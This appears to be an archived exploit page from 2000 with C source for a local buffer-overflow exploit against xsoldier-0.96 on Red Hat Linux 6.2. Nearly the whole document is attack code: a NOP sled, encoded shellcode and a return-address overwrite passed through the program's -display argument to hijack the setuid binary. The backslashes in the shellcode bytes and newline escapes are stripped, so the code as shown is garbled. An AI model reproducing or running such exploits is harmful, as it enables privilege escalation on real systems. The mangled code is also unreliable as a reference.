Linux xsoldier-0.96 exploit (Red Hat 6.2)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Linux xsoldier-0.96 exploit (Red Hat 6.2)
# Published : 2000-12-15
# Author : zorgon
# Previous Title : BSD chpass (pw_error(3)) Local Root Exploit
# Next Title : Sendmail 8.11.x Exploit (i386-Linux)

#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90
#define BUFSIZE 4408
#define OFFSET 0 
#define RANGE 20
 
unsigned char blah[] =
  "xebx03x5exebx05xe8xf8xffxffxffx83xc6x0dx31xc9xb1x6cx80x36x01x46xe2xfa"
  "xeax09x2ex63x68x6fx2ex72x69x01x80xedx66x2ax01x01"
  "x54x88xe4x82xedx1dx56x57x52xe9x01x01x01x01x5ax80xc2xc7x11"
  "x01x01x8cxbax1fxeexfexfexc6x44xfdx01x01x01x01x88x7cxf9xb9"
  "x47x01x01x01x30xf7x30xc8x52x88xf2xccx81x8cx4cxf9xb9x0ax01"
  "x01x01x88xffx30xd3x52x88xf2xccx81x30xc1x5ax5fx5ex88xedx5c"
  "xc2x91";

long get_sp () { __asm__ ("mov %esp, %eax"); }

int
main (int argc, char *argv[])
{
  char buffer[BUFSIZE];
  int i, offset;
  unsigned long ret;

  if (argc > 1)
    offset = atoi(argv[1]);
  else
    offset = OFFSET;

  for (i = 0; i < (BUFSIZE - strlen (blah) - RANGE*2); i++)
    *(buffer + i) = NOP;

  memcpy (buffer + i, blah, strlen (blah));

  ret = get_sp();	
  for (i = i + strlen (blah); i < BUFSIZE; i += 4)
    *(long *) &buffer[i] = ret+offset;

  fprintf(stderr, "xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)n");
  fprintf(stderr, "zorgon@antionline.orgn");		
  fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]n", ret + offset, offset, BUFSIZE);
  execl ("./xsoldier", "xsoldier", "-display", buffer, 0);
}


// www.Syue.com [2000-12-15]